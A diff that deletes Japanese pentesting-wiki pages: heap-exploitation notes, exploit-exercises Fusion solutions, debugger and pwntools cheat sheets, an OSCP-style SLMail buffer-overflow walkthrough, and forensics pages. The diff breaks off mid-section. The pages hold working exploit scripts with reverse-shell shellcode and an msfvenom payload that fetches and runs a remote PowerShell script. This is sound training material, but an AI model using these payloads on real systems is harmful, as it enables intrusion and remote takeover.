脆弱性をできるだけ早く実行するには、次のようにするのが理想的です: 脆弱なチャンクの予約、変更されるチャンクの予約、このチャンクを解放、変更されるチャンクよりも大きなチャンクを予約、チャンクを変更(脆弱性)、脆弱なサイズと同じサイズのチャンクを予約、そしてこのチャンクが選択したアドレスを指すように予約されます。
この攻撃を防ぐために、チャンクが「偽」でないことを確認するための典型的なチェックが使用されます: bck->fdがvictimを指しているかどうかを確認します。つまり、私たちのケースでは、スタックで指されている偽のチャンクのポインタfd*がvictimを指しているかどうかを確認します。この保護を回避するために、攻撃者は何らかの方法でおそらくスタックを介して適切なアドレスにvictimのアドレスを書き込むことができる必要があります。これにより、真のチャンクのように見えるようになります。
**LargeBinの破損**
前述の要件と同様の要件が必要であり、さらに、予約されたチャンクは512より大きくなければなりません。
攻撃は前述のように、bkポインタを変更する必要があり、すべてのmalloc()呼び出しが必要ですが、さらに、変更されたチャンクのサイズをそのサイズ - nbが<MINSIZEになるように変更する必要があります
例えば、サイズを1552に設定すると、1552 - 1544 = 8 < MINSIZE引き算は負になってはいけませんなぜならunsignedが比較されるからです
さらに、さらに複雑にするためのパッチが導入されました。
**ヒープスプレー**
基本的には、可能な限りすべてのメモリを予約し、これをnopsのマットレスとシェルコードで埋めることを意味します。また、マットレスとして0x0cを使用します。これにより、0x0c0c0c0cのアドレスに飛ぶことを試み、これにより、呼び出されるアドレスがこのマットレスで上書きされると、そこに飛ぶことになります。基本的に、戦術は、できるだけ多くの予約を行い、ポインタが上書きされるかどうかを確認し、0x0c0c0c0cに飛ぶことを期待してnopsがあることを確認します。
**ヒープ風水**
予約と解放を通じて、メモリをセグメント化し、空きチャンクの間に予約されたチャンクを配置します。オーバーフローするバッファは、これらの卵の1つに配置されます。
**objdump -d 実行可能ファイル** —> 関数を逆アセンブル\
**objdump -d ./PROGRAMA | grep FUNCION** —> 関数アドレスを取得\
**objdump -d -Mintel ./shellcodeout** —> 実際にシェルコードであることを確認し、OpCodesを取得\
**objdump -t ./exec | grep varBss** —> シンボルテーブル、変数と関数のアドレスを取得\
**objdump -TR ./exec | grep exit(func lib)** —> ライブラリ関数のアドレスを取得GOT\
**objdump -d ./exec | grep funcCode**\
**objdump -s -j .dtors /exec**\
**objdump -s -j .got ./exec**\
**objdump -t --dynamic-relo ./exec | grep puts** —> GOTで上書きするputsのアドレスを取得\
**objdump -D ./exec** —> pltのエントリまで全てを逆アセンブル\
**objdump -p -/exec**\
**Info functions strncmp —>** gdbでの関数情報
## 興味深いコース
- [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io)
- [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE)
- [https://ir0nstone.gitbook.io/notes](https://ir0nstone.gitbook.io/notes)
## **参考文献**
- [**https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html)
{{#include ../../banners/hacktricks-training.md}}

60
src/exploiting/linux-exploiting-basic-esp/fusion.md
View File

@ -1,60 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
# Level00
[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
1. EIPを変更するためのオフセットを取得する
2. EIPにシェルコードのアドレスを入れる
```python
from pwn import *
r = remote("192.168.85.181", 20000)
buf = "GET " # Needed
buf += "A"*139 # Offset 139
buf += p32(0xbffff440) # Stack address where the shellcode will be saved
buf += " HTTP/1.1" # Needed
buf += "\x90"*100 # NOPs
#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.85.178 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python
buf += "\xdb\xda\xb8\x3b\x50\xff\x66\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x12\x31\x42\x17\x83\xea\xfc\x03\x79\x43\x1d"
buf += "\x93\x4c\xb8\x16\xbf\xfd\x7d\x8a\x2a\x03\x0b\xcd\x1b"
buf += "\x65\xc6\x8e\xcf\x30\x68\xb1\x22\x42\xc1\xb7\x45\x2a"
buf += "\x12\xef\xe3\x18\xfa\xf2\x0b\x4d\xa7\x7b\xea\xdd\x31"
buf += "\x2c\xbc\x4e\x0d\xcf\xb7\x91\xbc\x50\x95\x39\x51\x7e"
buf += "\x69\xd1\xc5\xaf\xa2\x43\x7f\x39\x5f\xd1\x2c\xb0\x41"
buf += "\x65\xd9\x0f\x01"
r.recvline()
r.send(buf)
r.interactive()
```
# レベル01
```python
from pwn import *
r = remote("192.168.85.181", 20001)
buf = "GET " # Needed
buf += "A"*139 # Offset 139
buf += p32(0x08049f4f) # Adress of: JMP esp
buf += p32(0x9090E6FF) # OPCODE: JMP esi (the esi register have the address of the shellcode)
buf += " HTTP/1.1" # Needed
buf += "\x90"*100 # NOPs
#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.85.178 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python
buf += "\xdb\xda\xb8\x3b\x50\xff\x66\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x12\x31\x42\x17\x83\xea\xfc\x03\x79\x43\x1d"
buf += "\x93\x4c\xb8\x16\xbf\xfd\x7d\x8a\x2a\x03\x0b\xcd\x1b"
buf += "\x65\xc6\x8e\xcf\x30\x68\xb1\x22\x42\xc1\xb7\x45\x2a"
buf += "\x12\xef\xe3\x18\xfa\xf2\x0b\x4d\xa7\x7b\xea\xdd\x31"
buf += "\x2c\xbc\x4e\x0d\xcf\xb7\x91\xbc\x50\x95\x39\x51\x7e"
buf += "\x69\xd1\xc5\xaf\xa2\x43\x7f\x39\x5f\xd1\x2c\xb0\x41"
buf += "\x65\xd9\x0f\x01"
r.send(buf)
r.interactive()
```
{{#include ../../banners/hacktricks-training.md}}

210
src/exploiting/tools/README.md
View File

@ -1,210 +0,0 @@
# Exploiting Tools
{{#include ../../banners/hacktricks-training.md}}
## Metasploit
```
pattern_create.rb -l 3000 #Length
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
nasm_shell.rb
nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01
```
### シェルコード
```
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
```
## GDB
### インストール
```
apt-get install gdb
```
### パラメータ
```bash
-q # No show banner
-x <file> # Auto-execute GDB instructions from here
-p <pid> # Attach to process
```
### 指示
```bash
run # Execute
start # Start and break in main
n/next/ni # Execute next instruction (no inside)
s/step/si # Execute next instruction
c/continue # Continue until next breakpoint
p system # Find the address of the system function
set $eip = 0x12345678 # Change value of $eip
help # Get help
quit # exit
# Disassemble
disassemble main # Disassemble the function called main
disassemble 0x12345678 # Disassemble taht address
set disassembly-flavor intel # Use intel syntax
set follow-fork-mode child/parent # Follow child/parent process
# Breakpoints
br func # Add breakpoint to function
br *func+23
br *0x12345678
del <NUM> # Delete that number of breakpoint
watch EXPRESSION # Break if the value changes
# info
info functions --> Info abount functions
info functions func --> Info of the funtion
info registers --> Value of the registers
bt # Backtrace Stack
bt full # Detailed stack
print variable
print 0x87654321 - 0x12345678 # Caculate
# x/examine
examine/<num><o/x/d/u/t/i/s/c><b/h/w/g> dir_mem/reg/puntero # Shows content of <num> in <octal/hexa/decimal/unsigned/bin/instruction/ascii/char> where each entry is a <Byte/half word (2B)/Word (4B)/Giant word (8B)>
x/o 0xDir_hex
x/2x $eip # 2Words from EIP
x/2x $eip -4 # $eip - 4
x/8xb $eip # 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes)
i r eip # Value of $eip
x/w pointer # Value of the pointer
x/s pointer # String pointed by the pointer
x/xw &pointer # Address where the pointer is located
x/i $eip # Instructions of the EIP
```
### [GEF](https://github.com/hugsy/gef)
```bash
help memory # Get help on memory command
canary # Search for canary value in memory
checksec #Check protections
p system #Find system function address
search-pattern "/bin/sh" #Search in the process memory
vmmap #Get memory mappings
xinfo <addr> # Shows page, size, perms, memory area and offset of the addr in the page
memory watch 0x784000 0x1000 byte #Add a view always showinf this memory
got #Check got table
memory watch $_got()+0x18 5 #Watch a part of the got table
# Vulns detection
format-string-helper #Detect insecure format strings
heap-analysis-helper #Checks allocation and deallocations of memory chunks:NULL free, UAF,double free, heap overlap
#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61
#Another way to get the offset of to the RIP
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤ i f
Stack level 0, frame at 0x7fffffffddd0:
rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤ pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely
```
### Tricks
#### GDB 同じアドレス
デバッグ中、GDB は **実行時にバイナリが使用するアドレスとはわずかに異なるアドレスを持ちます。** GDB に同じアドレスを持たせるには、次のようにします:
- `unset env LINES`
- `unset env COLUMNS`
- `set env _=<path>` _バイナリの絶対パスを入力します_
- 同じ絶対ルートを使用してバイナリをエクスプロイトします
- `PWD``OLDPWD` は、GDB を使用しているときとバイナリをエクスプロイトしているときに同じでなければなりません
#### バックトレースで呼び出された関数を見つける
**静的リンクされたバイナリ**を持っている場合、すべての関数はバイナリに属します(外部ライブラリには属しません)。この場合、**バイナリがユーザー入力を要求するためのフローを特定するのは難しいです。**\
このフローは、**gdb** でバイナリを実行し、入力を求められるまで簡単に特定できます。その後、**CTRL+C** で停止し、**`bt`** **バックトレース**)コマンドを使用して呼び出された関数を確認します:
```
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
```
### GDBサーバー
`gdbserver --multi 0.0.0.0:23947` (IDAではLinuxマシンの実行可能ファイルの絶対パスを入力する必要があります。Windowsマシンでも同様です。)
## Ghidra
### スタックオフセットの検索
**Ghidra**は、**ローカル変数の位置に関する情報のおかげで、**バッファオーバーフローの**オフセット**を見つけるのに非常に便利です。**\
例えば、以下の例では、`local_bc`のバッファフローは`0xbc`のオフセットが必要であることを示しています。さらに、`local_10`がカナリークッキーである場合、`local_bc`からそれを上書きするには`0xac`のオフセットが必要です。\
_保存されたRIPの最初の0x08はRBPに属することを忘れないでください。_
![](<../../images/image (616).png>)
## GCC
**gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> 保護なしでコンパイル\
**-o** --> 出力\
**-g** --> コードを保存 (GDBが見ることができる)\
**echo 0 > /proc/sys/kernel/randomize_va_space** --> LinuxでASLRを無効にする
**シェルコードをコンパイルするには:**\
**nasm -f elf assembly.asm** --> ".o"を返す\
**ld assembly.o -o shellcodeout** --> 実行可能ファイル
## Objdump
**-d** --> **実行可能ファイル**のセクションを逆アセンブル (コンパイルされたシェルコードのオペコードを確認、ROPガジェットを見つける、関数アドレスを見つける...)\
**-Mintel** --> **Intel**構文\
**-t** --> **シンボル**テーブル\
**-D** --> **すべてを逆アセンブル** (静的変数のアドレス)\
**-s -j .dtors** --> dtorsセクション\
**-s -j .got** --> gotセクション\
\-D -s -j .plt --> **plt**セクション **逆コンパイル**\
**-TR** --> **再配置**\
**ojdump -t --dynamic-relo ./exec | grep puts** --> GOTで修正するための"puts"のアドレス\
**objdump -D ./exec | grep "VAR_NAME"** --> 静的変数のアドレス (これらはDATAセクションに格納されます)。
## コアダンプ
1. プログラムを開始する前に`ulimit -c unlimited`を実行します。
2. `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`を実行します。
3. sudo gdb --core=\<path/core> --quiet
## さらに
**ldd executable | grep libc.so.6** --> アドレス (ASLRが有効な場合、毎回変更されます)\
**for i in \`seq 0 20\`; do ldd \<Ejecutable> | grep libc; done** --> アドレスが頻繁に変わるかどうかを確認するためのループ\
**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> "system"のオフセット\
**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> "/bin/sh"のオフセット
**strace executable** --> 実行可能ファイルによって呼び出される関数\
**rabin2 -i ejecutable -->** すべての関数のアドレス
## **Inmunityデバッガ**
```bash
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
```
## IDA
### リモートLinuxでのデバッグ
IDAフォルダー内には、Linux内のバイナリをデバッグするために使用できるバイナリが含まれています。これを行うには、_linux_server_または_linux_server64_バイナリをLinuxサーバー内に移動し、バイナリを含むフォルダー内で実行します:
```
./linux_server64 -Ppass
```
次に、デバッガを設定します: Debugger (linux remote) --> Proccess options...:
![](<../../images/image (101).png>)
{{#include ../../banners/hacktricks-training.md}}

146
src/exploiting/tools/pwntools.md
View File

@ -1,146 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
```
pip3 install pwntools
```
# Pwn asm
行またはファイルからオペコードを取得します。
```
pwn asm "jmp esp"
pwn asm -i <filepath>
```
**選択可能:**
- 出力タイプ (raw, hex, string, elf)
- 出力ファイルコンテキスト (16, 32, 64, linux, windows...)
- バイトを避ける (改行, null, リスト)
- エンコーダを選択し、gdbを使用してデバッグシェルコードを実行し出力を得る
# **Pwn checksec**
Checksecスクリプト
```
pwn checksec <executable>
```
# Pwn constgrep
# Pwn cyclic
パターンを取得する
```
pwn cyclic 3000
pwn cyclic -l faad
```
**選択可能:**
- 使用するアルファベット(デフォルトは小文字)
- ユニークパターンの長さデフォルトは4
- コンテキスト16,32,64,linux,windows...
- オフセットを取る(-l
# Pwnデバッグ
プロセスにGDBをアタッチする
```
pwn debug --exec /bin/bash
pwn debug --pid 1234
pwn debug --process bash
```
**選択可能:**
- 実行可能ファイル、名前、または pid コンテキストによって (16,32,64,linux,windows...)
- 実行する gdbscript
- sysrootpath
# Pwn disablenx
バイナリの nx を無効にする
```
pwn disablenx <filepath>
```
# Pwn disasm
16進数オペコードを逆アセンブルする
```
pwn disasm ffe4
```
**選択可能:**
- コンテキスト (16,32,64,linux,windows...)
- ベースアドレス
- 色(デフォルト)/色なし
# Pwn elfdiff
2つのファイルの違いを表示します
```
pwn elfdiff <file1> <file2>
```
# Pwn hex
16進数表現を取得する
```bash
pwn hex hola #Get hex of "hola" ascii
```
# Pwn phd
ヘックスダンプを取得する
```
pwn phd <file>
```
**選択可能:**
- 表示するバイト数
- 行ごとのハイライトバイト数
- 開始時にスキップするバイト
# Pwn pwnstrip
# Pwn scrable
# Pwn shellcraft
シェルコードを取得する
```
pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcode with amd in the name
pwn shellcraft -f hex amd64.linux.sh #Create in C and run
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
```
**選択可能:**
- シェルコードとシェルコードの引数
- 出力ファイル
- 出力形式
- デバッグシェルコードにdbgをアタッチ
- 前(コードの前にデバッグトラップ)
- 後
- opcodesの使用を避けるデフォルト: nullおよび改行なし
- シェルコードを実行
- カラー/ノーカラー
- システムコールのリスト
- 可能なシェルコードのリスト
- 共有ライブラリとしてELFを生成
# Pwnテンプレート
Pythonテンプレートを取得
```
pwn template
```
**選択可能:** ホスト、ポート、ユーザー、パス、パス、クワイエット
# Pwn unhex
16進数から文字列へ
```
pwn unhex 686f6c61
```
# Pwn 更新
pwntoolsを更新するには
```
pwn update
```
{{#include ../../banners/hacktricks-training.md}}

237
src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
View File

@ -1,237 +0,0 @@
# Windows Exploiting (Basic Guide - OSCP lvl)
{{#include ../banners/hacktricks-training.md}}
## **SLMailサービスのインストールを開始する**
## SLMailサービスを再起動する
**SLMailサービスを再起動する**必要があるたびに、Windowsコンソールを使用して行うことができます:
```
net start slmail
```
![](<../images/image (23) (1).png>)
## 非常に基本的なPythonエクスプロイトテンプレート
```python
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110
buffer = 'A' * 2700
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port
```
## **Immunity Debuggerのフォントを変更する**
`Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`に移動します。
## **プロセスをImmunity Debuggerにアタッチする:**
**File --> Attach**
![](<../images/image (24) (1) (1).png>)
**そしてSTARTボタンを押します。**
## **エクスプロイトを送信し、EIPに影響があるか確認する:**
![](<../images/image (25) (1) (1).png>)
サービスを中断するたびに、このページの最初に示されているようにサービスを再起動する必要があります。
## EIPを変更するためのパターンを作成する
パターンは、以前にサービスを中断するために使用したバッファと同じ大きさである必要があります。
![](<../images/image (26) (1) (1).png>)
```
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
```
バッファを変更し、パターンを設定してエクスプロイトを起動します。
新しいクラッシュが発生するはずですが、異なるEIPアドレスで
![](<../images/image (27) (1) (1).png>)
アドレスがあなたのパターンに含まれているか確認します:
![](<../images/image (28) (1) (1).png>)
```
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
```
バッファの**オフセット2606**でEIPを変更できるようです。
エクスプロイトのバッファを変更して確認してください:
```
buffer = 'A'*2606 + 'BBBB' + 'CCCC'
```
このバッファでEIPがクラッシュした場合、42424242"BBBB")を指すべきです。
![](<../images/image (30) (1) (1).png>)
![](<../images/image (29) (1) (1).png>)
うまくいっているようです。
## スタック内のシェルコードスペースを確認する
600Bは強力なシェルコードには十分です。
バッファを変更しましょう:
```
buffer = 'A'*2606 + 'BBBB' + 'C'*600
```
新しいエクスプロイトを起動し、EBPと有用なシェルコードの長さを確認します。
![](<../images/image (31) (1).png>)
![](<../images/image (32) (1).png>)
脆弱性に到達すると、EBPがシェルコードを指しており、ここにシェルコードを配置するためのスペースがたくさんあることがわかります。
この場合、**0x0209A128から0x0209A2D6まで = 430Bです。** 十分です。
## 悪い文字を確認する
バッファを再度変更します:
```
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = 'A'*2606 + 'BBBB' + badchars
```
バッドキャラは0x01から始まります。なぜなら、0x00はほぼ常に悪いからです。
この新しいバッファでエクスプロイトを繰り返し実行し、無駄な文字を削除します。
例えば:
この場合、**0x0Aの文字は使用しないべきです**0x09の文字のためにメモリに何も保存されません
![](<../images/image (33) (1).png>)
この場合、**0x0Dの文字は避けられています**
![](<../images/image (34) (1).png>)
## JMP ESPをリターンアドレスとして見つける
使用:
```
!mona modules #Get protections, look for all false except last one (Dll of SO)
```
メモリマップを**リストします**。次の条件を満たすDLLを探します
- **Rebase: False**
- **SafeSEH: False**
- **ASLR: False**
- **NXCompat: False**
- **OS Dll: True**
![](<../images/image (35) (1).png>)
次に、このメモリ内でJMP ESPバイトを見つける必要があります。そのためには、次のコマンドを実行します
```
!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
```
**次に、アドレスが見つかった場合は、badcharを含まないものを選択します:**
![](<../images/image (36) (1).png>)
**この場合、例えば: \_0x5f4a358f**\_
## シェルコードを作成する
```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'
```
もしエクスプロイトが機能していないが、機能するはずである場合ImDebgでシェルコードに到達しているのが確認できる、他のシェルコードを作成してみてくださいmsfvenomを使用して同じパラメータの異なるシェルコードを作成します
**シェルコードの最初にいくつかのNOPを追加**し、それを使用してリターンアドレスをJMP ESPに設定し、エクスプロイトを完了させます。
```bash
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110
shellcode = (
"\xb8\x30\x3f\x27\x0c\xdb\xda\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x52\x31\x45\x12\x83\xed\xfc\x03\x75\x31\xc5\xf9\x89\xa5\x8b"
"\x02\x71\x36\xec\x8b\x94\x07\x2c\xef\xdd\x38\x9c\x7b\xb3\xb4"
"\x57\x29\x27\x4e\x15\xe6\x48\xe7\x90\xd0\x67\xf8\x89\x21\xe6"
"\x7a\xd0\x75\xc8\x43\x1b\x88\x09\x83\x46\x61\x5b\x5c\x0c\xd4"
"\x4b\xe9\x58\xe5\xe0\xa1\x4d\x6d\x15\x71\x6f\x5c\x88\x09\x36"
"\x7e\x2b\xdd\x42\x37\x33\x02\x6e\x81\xc8\xf0\x04\x10\x18\xc9"
"\xe5\xbf\x65\xe5\x17\xc1\xa2\xc2\xc7\xb4\xda\x30\x75\xcf\x19"
"\x4a\xa1\x5a\xb9\xec\x22\xfc\x65\x0c\xe6\x9b\xee\x02\x43\xef"
"\xa8\x06\x52\x3c\xc3\x33\xdf\xc3\x03\xb2\x9b\xe7\x87\x9e\x78"
"\x89\x9e\x7a\x2e\xb6\xc0\x24\x8f\x12\x8b\xc9\xc4\x2e\xd6\x85"
"\x29\x03\xe8\x55\x26\x14\x9b\x67\xe9\x8e\x33\xc4\x62\x09\xc4"
"\x2b\x59\xed\x5a\xd2\x62\x0e\x73\x11\x36\x5e\xeb\xb0\x37\x35"
"\xeb\x3d\xe2\x9a\xbb\x91\x5d\x5b\x6b\x52\x0e\x33\x61\x5d\x71"
"\x23\x8a\xb7\x1a\xce\x71\x50\x2f\x04\x79\x89\x47\x18\x79\xd8"
"\xcb\x95\x9f\xb0\xe3\xf3\x08\x2d\x9d\x59\xc2\xcc\x62\x74\xaf"
"\xcf\xe9\x7b\x50\x81\x19\xf1\x42\x76\xea\x4c\x38\xd1\xf5\x7a"
"\x54\xbd\x64\xe1\xa4\xc8\x94\xbe\xf3\x9d\x6b\xb7\x91\x33\xd5"
"\x61\x87\xc9\x83\x4a\x03\x16\x70\x54\x8a\xdb\xcc\x72\x9c\x25"
"\xcc\x3e\xc8\xf9\x9b\xe8\xa6\xbf\x75\x5b\x10\x16\x29\x35\xf4"
"\xef\x01\x86\x82\xef\x4f\x70\x6a\x41\x26\xc5\x95\x6e\xae\xc1"
"\xee\x92\x4e\x2d\x25\x17\x7e\x64\x67\x3e\x17\x21\xf2\x02\x7a"
"\xd2\x29\x40\x83\x51\xdb\x39\x70\x49\xae\x3c\x3c\xcd\x43\x4d"
"\x2d\xb8\x63\xe2\x4e\xe9"
)
buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port
```
> [!WARNING]
> 自己を**上書きする**シェルコードがあるため、シェルコードの前に常にいくつかのNOPを追加することが重要です。
## シェルコードの改善
このパラメータを追加します:
```
EXITFUNC=thread -e x86/shikata_ga_nai
```
{{#include ../banners/hacktricks-training.md}}

82
src/forensics/basic-forensic-methodology/README.md
View File

@ -1,82 +0,0 @@
# 基本的なフォレンジック手法
{{#include ../../banners/hacktricks-training.md}}
## イメージの作成とマウント
{{#ref}}
../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
{{#endref}}
## マルウェア分析
これは**イメージを取得した後に最初に行うべきステップではありません**。しかし、ファイル、ファイルシステムイメージ、メモリイメージ、pcapなどがある場合は、このマルウェア分析技術を独立して使用できますので、これらのアクションを**念頭に置いておくことが重要です**
{{#ref}}
malware-analysis.md
{{#endref}}
## イメージの検査
デバイスの**フォレンジックイメージ**が与えられた場合、**パーティションやファイルシステム**を**分析し**、潜在的に**興味深いファイル**(削除されたものも含む)を**回復する**ことができます。方法を学ぶには:
{{#ref}}
partitions-file-systems-carving/
{{#endref}}
使用されるOSやプラットフォームによって、異なる興味深いアーティファクトを検索する必要があります
{{#ref}}
windows-forensics/
{{#endref}}
{{#ref}}
linux-forensics.md
{{#endref}}
{{#ref}}
docker-forensics.md
{{#endref}}
## 特定のファイルタイプとソフトウェアの深い検査
非常に**疑わしい****ファイル**がある場合、**ファイルタイプやそれを作成したソフトウェア**に応じて、いくつかの**トリック**が役立つかもしれません。\
興味深いトリックを学ぶには、以下のページをお読みください:
{{#ref}}
specific-software-file-type-tricks/
{{#endref}}
特に言及したいページがあります:
{{#ref}}
specific-software-file-type-tricks/browser-artifacts.md
{{#endref}}
## メモリダンプの検査
{{#ref}}
memory-dump-analysis/
{{#endref}}
## Pcapの検査
{{#ref}}
pcap-inspection/
{{#endref}}
## **アンチフォレンジック技術**
アンチフォレンジック技術の使用の可能性を念頭に置いてください:
{{#ref}}
anti-forensic-techniques.md
{{#endref}}
## 脅威ハンティング
{{#ref}}
file-integrity-monitoring.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

151
src/forensics/basic-forensic-methodology/anti-forensic-techniques.md
View File

@ -1,151 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
# タイムスタンプ
攻撃者は、**ファイルのタイムスタンプを変更すること**に興味を持つかもしれません。\
タイムスタンプは、MFT内の属性`$STANDARD_INFORMATION`**および**`$FILE_NAME`に見つけることができます。
両方の属性には4つのタイムスタンプがあります: **変更**, **アクセス**, **作成**, および **MFTレジストリ変更** (MACEまたはMACB)。
**Windowsエクスプローラー**や他のツールは、**`$STANDARD_INFORMATION`**からの情報を表示します。
## TimeStomp - アンチフォレンジックツール
このツールは、**`$STANDARD_INFORMATION`**内のタイムスタンプ情報を**変更**しますが、**`$FILE_NAME`**内の情報は**変更しません**。したがって、**疑わしい** **活動を特定することが可能です**
## Usnjrnl
**USNジャーナル** (Update Sequence Number Journal) は、NTFS (Windows NTファイルシステム) の機能で、ボリュームの変更を追跡します。[**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv)ツールを使用すると、これらの変更を調査できます。
![](<../../images/image (449).png>)
前の画像は、**ツール**によって表示された**出力**で、ファイルに対して**いくつかの変更が行われた**ことが観察できます。
## $LogFile
**ファイルシステムへのすべてのメタデータ変更は、**[write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging)として知られるプロセスでログに記録されます。ログに記録されたメタデータは、NTFSファイルシステムのルートディレクトリにある`**$LogFile**`という名前のファイルに保持されます。[LogFileParser](https://github.com/jschicht/LogFileParser)のようなツールを使用して、このファイルを解析し、変更を特定できます。
![](<../../images/image (450).png>)
再び、ツールの出力では、**いくつかの変更が行われた**ことが確認できます。
同じツールを使用して、**タイムスタンプが変更された時刻を特定することが可能です**
![](<../../images/image (451).png>)
- CTIME: ファイルの作成時刻
- ATIME: ファイルの変更時刻
- MTIME: ファイルのMFTレジストリ変更
- RTIME: ファイルのアクセス時刻
## `$STANDARD_INFORMATION``$FILE_NAME` の比較
疑わしい変更されたファイルを特定する別の方法は、両方の属性の時間を比較して**不一致**を探すことです。
## ナノ秒
**NTFS**のタイムスタンプは**100ナ秒**の**精度**を持っています。したがって、2010-10-10 10:10:**00.000:0000のようなタイムスタンプを持つファイルを見つけることは非常に疑わしいです。
## SetMace - アンチフォレンジックツール
